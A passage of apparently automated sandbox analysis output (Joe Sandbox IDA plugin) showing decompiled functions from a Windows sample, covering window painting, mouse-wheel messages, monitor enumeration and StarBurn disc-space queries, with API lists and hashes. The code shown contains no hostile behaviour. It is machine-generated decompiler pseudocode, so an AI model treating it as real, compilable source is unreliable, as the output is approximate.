      				intOrPtr _t216;
      				signed int _t234;
      				void* _t237;
      				void* _t239;
      				intOrPtr _t240;
      
      				_t237 = _t239;
      				_t240 = _t239 + 0xffffffc4;
      				_v12 = __edx;
      				_v8 = __eax;
      				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
      					_t120 = E0044B158(_v8);
      					_push(_t120);
      					L00407768();
      					_v16 = _t120;
      					_push(_t237);
      					_push(0x44c216);
      					_push( *[fs:edx]);
      					 *[fs:edx] = _t240;
      					GetClientRect(E0044B158(_v8),  &_v32);
      					GetWindowRect(E0044B158(_v8),  &_v48);
      					MapWindowPoints(0, E0044B158(_v8),  &_v48, 2);
      					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
      					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					if( *(_v8 + 0x165) != 0) {
      						_t208 = 0;
      						if( *(_v8 + 0x163) != 0) {
      							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
      						}
      						if( *(_v8 + 0x164) != 0) {
      							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
      						}
      						_t234 = GetWindowLongA(E0044B158(_v8), 0xfffffff0);
      						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
      							_v48.left = _v48.left - _t208;
      						}
      						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
      							_v48.top = _v48.top - _t208;
      						}
      						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
      							_v48.right = _v48.right + _t208;
      						}
      						if((_t234 & 0x00200000) != 0) {
      							_t196 =  *0x48f6b0; // 0x490904
      							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
      						}
      						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
      							_v48.bottom = _v48.bottom + _t208;
      						}
      						if((_t234 & 0x00100000) != 0) {
      							_t193 =  *0x48f6b0; // 0x490904
      							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
      						}
      						DrawEdge(_v16,  &_v48,  *(0x48eca4 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x48ecb4 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x48ecc4 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x48ecd4 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
      					}
      					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
      					FillRect(_v16,  &_v48, E0042632C( *((intOrPtr*)(_v8 + 0x170))));
      					_pop(_t216);
      					 *[fs:eax] = _t216;
      					_push(0x44c21d);
      					_push(_v16);
      					_t171 = E0044B158(_v8);
      					_push(_t171);
      					L004078C0();
      					return _t171;
      				} else {
      					 *((intOrPtr*)( *_v8 - 0x10))();
      					_t205 = E00430EB0(E00430DA8());
      					if(_t205 != 0) {
      						_t205 = _v8;
      						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
      							_t205 = E004314F8(E00430DA8(), 0, _v8);
      						}
      					}
      					return _t205;
      				}
      			}

      APIs
      • 73BEB080.USER32(00000000), ref: 0044BFE4
      • GetClientRect.USER32(00000000,?), ref: 0044C007
      • GetWindowRect.USER32 ref: 0044C019
      • MapWindowPoints.USER32 ref: 0044C02F
      • OffsetRect.USER32(?,?,?), ref: 0044C044
      • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0044C216), ref: 0044C05D
      • InflateRect.USER32(?,00000000,00000000), ref: 0044C07B
      • GetWindowLongA.USER32 ref: 0044C0D1
      • DrawEdge.USER32(?,?,00000000,00000008), ref: 0044C19D
      • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0044C1B6
      • OffsetRect.USER32(?,?,?), ref: 0044C1D5
      • FillRect.USER32 ref: 0044C1F1
      • 73BEB380.USER32(00000000,?,0044C21D,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0044C210
      Similarity
      • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
      • String ID:
      • API String ID: 156109915-0
      • Opcode ID: 7d2a0a7792a1443939760a1ee51a991a611a6696da56f832f9267a94d7673c00
      • Instruction ID: af4b58efa51be27f327ece3e551d57c4b3afae2afa13afeed174249681c73289
      • Opcode Fuzzy Hash: 7d2a0a7792a1443939760a1ee51a991a611a6696da56f832f9267a94d7673c00
      • Instruction Fuzzy Hash: 1B910771E04148AFDB41DBA9C885EEEB7F9AF09304F1444A6F914F7252C779AE04CB64
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00407B7C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
      				intOrPtr* _v8;
      				struct HWND__* _t19;
      				int* _t20;
      				int* _t26;
      				int* _t27;
      
      				_t26 = _t20;
      				_t27 = __edx;
      				_v8 = __eax;
      				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
      				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
      				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
      				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
      				if( *_t27 == 0 || _t19 == 0) {
      					 *_a8 = 0;
      				} else {
      					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
      				}
      				if( *_t26 == 0 || _t19 == 0) {
      					 *_a4 = 3;
      				} else {
      					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
      				}
      				return _t19;
      			}

      APIs
      • FindWindowA.USER32 ref: 00407B94
      • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407BA0
      • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407BAF
      • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407BBB
      • SendMessageA.USER32 ref: 00407BD3
      • SendMessageA.USER32 ref: 00407BF7
      Strings
      Similarity
      • API ID: ClipboardFormatRegister$MessageSend$FindWindow
      • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
      • API String ID: 1416857345-3736581797
      • Opcode ID: 6508cf304c44e04ad120275376b86e2ab663c874d1c8dc48a162c889ec399333
      • Instruction ID: 48c165740c3543a2106c64c8a974308a4dad1d38a08fed59214040162a8c295a
      • Opcode Fuzzy Hash: 6508cf304c44e04ad120275376b86e2ab663c874d1c8dc48a162c889ec399333
      • Instruction Fuzzy Hash: A4114F71A4C301AFF311AF55CC41B6AB7A8EF45714F20843AB940AB3C0E6B87D40C7AA
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 57%
      			E004314F8(void* __eax, void* __ecx, intOrPtr __edx) {
      				intOrPtr _v8;
      				struct HDC__* _v12;
      				struct tagRECT _v28;
      				struct tagRECT _v44;
      				char _v56;
      				char _v72;
      				signed char _t43;
      				struct HDC__* _t55;
      				void* _t74;
      				signed int _t77;
      				int _t78;
      				int _t79;
      				void* _t92;
      				intOrPtr _t105;
      				void* _t114;
      				void* _t117;
      				void* _t120;
      				void* _t122;
      				intOrPtr _t123;
      
      				_t120 = _t122;
      				_t123 = _t122 + 0xffffffbc;
      				_t92 = __ecx;
      				_v8 = __edx;
      				_t114 = __eax;
      				_t43 = GetWindowLongA(E0044B158(_v8), 0xffffffec);
      				if((_t43 & 0x00000002) == 0) {
      					return _t43;
      				} else {
      					GetWindowRect(E0044B158(_v8),  &_v44);
      					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
      					_t55 = E0044B158(_v8);
      					_push(_t55);
      					L00407768();
      					_v12 = _t55;
      					_push(_t120);
      					_push(0x431653);
      					_push( *[fs:edx]);
      					 *[fs:edx] = _t123;
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t117 = _t114;
      					if(_t92 != 0) {
      						_t77 = GetWindowLongA(E0044B158(_v8), 0xfffffff0);
      						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
      							_t78 = GetSystemMetrics(2);
      							_t79 = GetSystemMetrics(3);
      							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
      							E00418618(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
      							asm("movsd");
      							asm("movsd");
      							asm("movsd");
      							asm("movsd");
      							_t117 = _t117;
      							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
      						}
      					}
      					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
      					E00431018( &_v56, 2);
      					E00430F6C(_t117,  &_v56, _v12, 0,  &_v44);
      					_pop(_t105);
      					 *[fs:eax] = _t105;
      					_push(0x43165a);
      					_push(_v12);
      					_t74 = E0044B158(_v8);
      					_push(_t74);
      					L004078C0();
      					return _t74;
      				}
      			}

      APIs
      • GetWindowLongA.USER32 ref: 00431513
      • GetWindowRect.USER32 ref: 0043152E
      • OffsetRect.USER32(?,?,?), ref: 00431543
      • 73BEB080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00431551
      • GetWindowLongA.USER32 ref: 00431582
      • GetSystemMetrics.USER32 ref: 00431597
      • GetSystemMetrics.USER32 ref: 004315A0
      • InflateRect.USER32(?,000000FE,000000FE), ref: 004315AF
      • GetSysColorBrush.USER32(0000000F), ref: 004315DC
      • FillRect.USER32 ref: 004315EA
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00431653,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043160F
      • 73BEB380.USER32(00000000,?,0043165A,?,?,00000000,00431653,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043164D
      Similarity
      • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
      • String ID:
      • API String ID: 3936689491-0
      • Opcode ID: d4119b3a32b5947f2531282d6dd8e0b23464a3c5ccd1f1e3468c08536ce62408
      • Instruction ID: 44e5fce61399ba1f9cf41d9bb894a17272d639a42f1f056529d16ae1c83c0070
      • Opcode Fuzzy Hash: d4119b3a32b5947f2531282d6dd8e0b23464a3c5ccd1f1e3468c08536ce62408
      • Instruction Fuzzy Hash: EF413C71E04108ABDB01EBE9CD86EDFB7BDEF49354F104526F904F7291CA38AA0487A5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 88%
      			E0042DAE4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
      				struct tagPOINT _v12;
      				int _v16;
      				struct tagRECT _v32;
      				struct tagRECT _v48;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				void* _t60;
      				int _t61;
      				RECT* _t64;
      				struct HDC__* _t65;
      
      				_t64 = _a8;
      				_t65 = _a4;
      				if( *0x490933 != 0) {
      					_t61 = 0;
      					if(_a12 == 0) {
      						L14:
      						return _t61;
      					}
      					_v32.left = 0;
      					_v32.top = 0;
      					_v32.right = GetSystemMetrics(0);
      					_v32.bottom = GetSystemMetrics(1);
      					if(_t65 == 0) {
      						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
      							L13:
      							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
      						} else {
      							_t61 = 1;
      						}
      						goto L14;
      					}
      					_v16 = GetClipBox(_t65,  &_v48);
      					if(GetDCOrgEx(_t65,  &_v12) == 0) {
      						goto L14;
      					}
      					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
      					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
      						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
      							goto L13;
      						}
      						if(_v16 == 1) {
      							_t61 = 1;
      						}
      						goto L14;
      					} else {
      						goto L13;
      					}
      				}
      				 *0x490920 = E0042D52C(7, _t60, "EnumDisplayMonitors",  *0x490920, _t65);
      				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
      				goto L14;
      			}

      APIs
      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042DB1D
      • GetSystemMetrics.USER32 ref: 0042DB42
      • GetSystemMetrics.USER32 ref: 0042DB4D
      • GetClipBox.GDI32(?,?), ref: 0042DB5F
      • GetDCOrgEx.GDI32(?,?), ref: 0042DB6C
      • OffsetRect.USER32(?,?,?), ref: 0042DB85
      • IntersectRect.USER32 ref: 0042DB96
      • IntersectRect.USER32 ref: 0042DBAC
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
      • String ID: EnumDisplayMonitors
      • API String ID: 362875416-2491903729
      • Opcode ID: 4fff6a5c103f961ff8e09f8f75a3db9a6acba56e747655328087e9e2bb768a2b
      • Instruction ID: 750d737732ca315eb021a3dc7bb8c0d53296e30f3f071cdfa3576e0cb3f45ca9
      • Opcode Fuzzy Hash: 4fff6a5c103f961ff8e09f8f75a3db9a6acba56e747655328087e9e2bb768a2b
      • Instruction Fuzzy Hash: 64312DB2E04219AFDB11DFA5DC44AEF77BCAB49301F414127E915E3241E738A901CBA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E004492C0(intOrPtr* __eax, void* __edx) {
      				struct HDC__* _v8;
      				void* _v12;
      				void* _v16;
      				struct tagPAINTSTRUCT _v80;
      				intOrPtr _v84;
      				void* _v96;
      				struct HDC__* _v104;
      				void* _v112;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t38;
      				struct HDC__* _t47;
      				struct HDC__* _t55;
      				intOrPtr* _t83;
      				intOrPtr _t102;
      				void* _t103;
      				void* _t108;
      				void* _t111;
      				void* _t113;
      				intOrPtr _t114;
      
      				_t111 = _t113;
      				_t114 = _t113 + 0xffffff94;
      				_push(_t103);
      				_t108 = __edx;
      				_t83 = __eax;
      				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
      					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00447E60(_t83) != 0) {
      						_t38 = E00448DE4(_t83, _t83, _t108, _t103, _t108);
      					} else {
      						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
      					}
      					return _t38;
      				} else {
      					L00407658();
      					 *((intOrPtr*)( *__eax + 0x44))();
      					 *((intOrPtr*)( *__eax + 0x44))();
      					_t47 = _v104;
      					L00407278();
      					_v12 = _t47;
      					L004078C0();
      					L00407280();
      					_v8 = _t47;
      					_v16 = SelectObject(_v8, _v12);
      					 *[fs:eax] = _t114;
      					_t55 = BeginPaint(E0044B158(_t83),  &_v80);
      					E00445AE8(_t83, _v8, 0x14, _v8);
      					 *((intOrPtr*)(_t108 + 4)) = _v8;
      					E004492C0(_t83, _t108);
      					 *((intOrPtr*)(_t108 + 4)) = 0;
      					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x449412, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
      					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
      					_push(_v104);
      					_push(0);
      					_push(0);
      					L00407258();
      					EndPaint(E0044B158(_t83),  &_v80);
      					_t102 = _t55;
      					 *[fs:eax] = _t102;
      					_push(0x449419);
      					SelectObject(_v8, _v16);
      					DeleteDC(_v8);
      					return DeleteObject(_v12);
      				}
      			}

      0x004492c1
      0x004492c3
      0x004492c8
      0x004492c9
      0x004492cb
      0x004492d4
      0x004492e0
      0x004492ff
      0x004492ed
      0x004492f3
      0x004492f3
      0x0044941f
      0x00449309
      0x0044930b
      0x00449319
      0x00449327
      0x0044932a
      0x0044932f
      0x00449334
      0x0044933a
      0x00449341
      0x00449346
      0x00449356
      0x00449364
      0x00449373
      0x00449388
      0x00449390
      0x00449397
      0x0044939e
      0x004493b5
      0x004493c3
      0x004493c9
      0x004493ca
      0x004493cc
      0x004493cf
      0x004493e0
      0x004493e7
      0x004493ea
      0x004493ed
      0x004493fa
      0x00449403
      0x00449411
      0x00449411

      APIs
      • 73BEAC50.USER32(00000000), ref: 0044930B
      • 73BEA520.GDI32(00000000,?), ref: 0044932F
      • 73BEB380.USER32(00000000,00000000,00000000,?), ref: 0044933A
      • 73BEA590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00449341
      • SelectObject.GDI32(?,?), ref: 00449351
      • BeginPaint.USER32(00000000,?,00000000,00449412,?,?,?,00000000,00000000,00000000,00000000,?), ref: 00449373
      • 73BF97E0.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 004493CF
      • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 004493E0
      • SelectObject.GDI32(?,?), ref: 004493FA
      • DeleteDC.GDI32(?), ref: 00449403
      • DeleteObject.GDI32(?), ref: 0044940C
        • Part of subcall function 00448DE4: BeginPaint.USER32(00000000,?), ref: 00448E0A
        • Part of subcall function 00448DE4: EndPaint.USER32(00000000,?,00448F0B), ref: 00448EFE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Paint$Object$BeginDeleteSelect$A520A590B380
      • String ID:
      • API String ID: 2363126454-0
      • Opcode ID: 4592e54644e2acaf5eedcabcda8808abf402a514375308b7dc00a3075179b67d
      • Instruction ID: 582b59201a8b2163b2cf0d8b0032f4884ff28defebcfc6aa787f3df1994e5ca7
      • Opcode Fuzzy Hash: 4592e54644e2acaf5eedcabcda8808abf402a514375308b7dc00a3075179b67d
      • Instruction Fuzzy Hash: 2D414C71B04204AFDB00EBE9CD85B9EB7F8AB49304F1044BAF509EB281DA78ED059B55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 57%
      			E00486828(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
      				intOrPtr _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v90;
      				char _v1114;
      				char _v1120;
      				char* _v1124;
      				char _v1128;
      				char _v1132;
      				char _v1136;
      				char _v1140;
      				char _v1144;
      				char _v1148;
      				char* _t95;
      				char _t98;
      				char _t103;
      				intOrPtr* _t122;
      				intOrPtr* _t130;
      				intOrPtr* _t140;
      				char* _t150;
      				intOrPtr* _t158;
      				intOrPtr* _t194;
      				void* _t197;
      				void* _t199;
      
      				_t206 = __fp0;
      				_t192 = __edi;
      				_v36 = 0;
      				_t194 = __ecx;
      				_push(_t197);
      				_push(0x486ad7);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t197 + 0xfffffb88;
      				E00466988(__ecx);
      				_v28 = 0;
      				_v32 = 0x1f;
      				E00407A30();
      				_t199 =  *((intOrPtr*)(__edx + 0x2c)) - 1;
      				if(_t199 < 0) {
      					_push(1);
      					_push(E00404F00( *((intOrPtr*)(__edx + 0x28))));
      					_push(0);
      					_push(0);
      					_push( &_v90);
      					_push( &_v32);
      					_push(0x400);
      					_push( &_v1114);
      					_t95 =  &_v28;
      					_push(_t95);
      					L00465E04();
      					_t164 = _t95;
      					if(_t95 != 0) {
      						_v1140 = 0;
      						_v1136 = 0;
      						_v1132 = _v32;
      						_v1128 = 0;
      						_v1124 =  &_v1114;
      						_v1120 = 6;
      						E0040A164("StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
      						_t140 =  *0x48f538; // 0x490c50
      						E0047FD7C( *_t140, _t164, 0, _v36, __edi, _t194, __fp0);
      					}
      				} else {
      					if(_t199 == 0) {
      						_push(1);
      						_push( *((intOrPtr*)(__edx + 0x24)));
      						_push( *((intOrPtr*)(__edx + 0x23)));
      						_push( *((intOrPtr*)(__edx + 0x22)));
      						_push( *((intOrPtr*)(__edx + 0x21)));
      						_push(0);
      						_push(0);
      						_push( &_v90);
      						_push( &_v32);
      						_push(0x400);
      						_push( &_v1114);
      						_t150 =  &_v28;
      						_push(_t150);
      						L00465DFC();
      						_t167 = _t150;
      						if(_t150 != 0) {
      							_v1140 = 0;
      							_v1136 = 0;
      							_v1132 = _v32;
      							_v1128 = 0;
      							_v1124 =  &_v1114;
      							_v1120 = 6;
      							E0040A164("StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
      							_t158 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t158, _t167, 0, _v36, __edi, _t194, __fp0);
      						}
      					}
      				}
      				_push( &_v12);
      				_push( &_v24);
      				_push(3);
      				_t98 = _v28;
      				_push(_t98);
      				L00465F2C();
      				_t165 = _t98;
      				if(_t98 != 0) {
      					_v1148 = 0;
      					_v1144 = 0;
      					E0040A164("StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d\"", 0,  &_v1148,  &_v36);
      					_t130 =  *0x48f538; // 0x490c50
      					E0047FD7C( *_t130, _t165, 0, _v36, _t192, _t194, _t206);
      				}
      				_push( &_v20);
      				_push( &_v90);
      				_push( &_v32);
      				_push(0x400);
      				_push( &_v1114);
      				_t103 = _v28;
      				_push(_t103);
      				L00465F34();
      				_t166 = _t103;
      				if(_t103 != 0) {
      					_v1140 = 0;
      					_v1136 = 0;
      					_v1132 = _v32;
      					_v1128 = 0;
      					_v1124 =  &_v1114;
      					_v1120 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text \"%s\"", 2,  &_v1140,  &_v36);
      					_t122 =  *0x48f538; // 0x490c50
      					E0047FD7C( *_t122, _t166, 0, _v36, _t192, _t194, _t206);
      				}
      				asm("adc edx, [ebp-0x4]");
      				 *((intOrPtr*)(_t194 + 8)) = _v20 + _v12;
      				 *((intOrPtr*)(_t194 + 0xc)) = _v16;
      				 *_t194 = _v12;
      				 *((intOrPtr*)(_t194 + 4)) = _v8;
      				 *((intOrPtr*)(_t194 + 0x10)) = _v20;
      				 *((intOrPtr*)(_t194 + 0x14)) = _v16;
      				 *((intOrPtr*)(_t194 + 0x18)) = _v24;
      				 *((intOrPtr*)(_t194 + 0x1c)) = 0;
      				_push( &_v28);
      				L00465DCC();
      				 *[fs:eax] = 0;
      				_push(0x486ade);
      				return E00404A40( &_v36);
      			}

      0x00486828
      0x00486828
      0x00486835
      0x00486838
      0x0048683e
      0x0048683f
      0x00486844
      0x00486847
      0x0048684c
      0x00486853
      0x00486856
      0x00486868
      0x00486870
      0x00486872
      0x0048691e
      0x00486928
      0x00486929
      0x0048692b
      0x00486930
      0x00486934
      0x00486935
      0x00486940
      0x00486941
      0x00486944
      0x00486945
      0x0048694a
      0x0048694e
      0x00486958
      0x0048695e
      0x00486968
      0x0048696e
      0x0048697b
      0x00486981
      0x00486998
      0x0048699d
      0x004869a9
      0x004869a9
      0x00486878
      0x00486878
      0x0048687e
      0x00486883
      0x00486887
      0x0048688b
      0x0048688f
      0x00486890
      0x00486892
      0x00486897
      0x0048689b
      0x0048689c
      0x004868a7
      0x004868a8
      0x004868ab
      0x004868ac
      0x004868b1
      0x004868b5
      0x004868c3
      0x004868c9
      0x004868d3
      0x004868d9
      0x004868e6
      0x004868ec
      0x00486903
      0x00486908
      0x00486914
      0x00486914
      0x004868b5
      0x00486878
      0x004869b1
      0x004869b5
      0x004869b6
      0x004869b8
      0x004869bb
      0x004869bc
      0x004869c1
      0x004869c5
      0x004869cf
      0x004869d5
      0x004869e9
      0x004869ee
      0x004869fa
      0x004869fa
      0x00486a02
      0x00486a06
      0x00486a0a
      0x00486a0b
      0x00486a16
      0x00486a17
      0x00486a1a
      0x00486a1b
      0x00486a20
      0x00486a24
      0x00486a2e
      0x00486a34
      0x00486a3e
      0x00486a44
      0x00486a51
      0x00486a57
      0x00486a6e
      0x00486a73
      0x00486a7f
      0x00486a7f
      0x00486a8d
      0x00486a90
      0x00486a93
      0x00486a99
      0x00486a9e
      0x00486aa4
      0x00486aaa
      0x00486ab2
      0x00486ab5
      0x00486abb
      0x00486abc
      0x00486ac6
      0x00486ac9
      0x00486ad6

      APIs
      • StarBurn_CdvdBurnerGrabber_Create.STARBURN(00000000,?,00000400,0000001F,?,00000000,00000000,?,?,?,?,00000001,00000000,00486AD7,?,00000000), ref: 004868AC
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(00000000,?,00000400,0000001F,?,00000000,00000000,00000000,00000001,00000000,00486AD7,?,00000000,00000000,?,0048666E), ref: 00486945
      • StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace.STARBURN(00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?,00000000,00000000,00000000,00000001,00000000,00486AD7), ref: 004869BC
      • StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace.STARBURN(00000000,?,00000400,0000001F,?,?,00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?,00000000), ref: 00486A1B
      • StarBurn_Destroy.STARBURN(00000000,00000000,?,00000400,0000001F,?,?,00000000,00000003,00486817,?,00000000,?,00000400,0000001F,?), ref: 00486ABC
      Strings
      • StarBurn_CdvdBurnerGrabber_CreateEx() failed, exception %d, status %d, text "%s", xrefs: 00486993
      • StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s", xrefs: 004868FE
      • StarBurn_CdvdBurnerGrabber_GetDiscFreeSpace() failed, exception %d", xrefs: 004869E4
      • StarBurn_CdvdBurnerGrabber_GetDiscUsedSpace() failed, exception %d, status %d, text "%s", xrefs: 00486A69
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdGrabber_$CreateDiscSpace$DestroyFreeUsed
